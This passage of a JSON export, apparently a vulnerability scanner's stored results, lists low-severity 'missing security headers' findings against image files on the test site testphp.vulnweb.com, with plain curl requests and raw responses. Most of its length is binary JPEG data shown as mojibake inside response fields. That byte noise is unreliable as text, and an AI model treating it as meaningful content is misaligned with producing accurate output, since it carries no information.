���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 974, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:40.620Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 975, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:40.890Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� 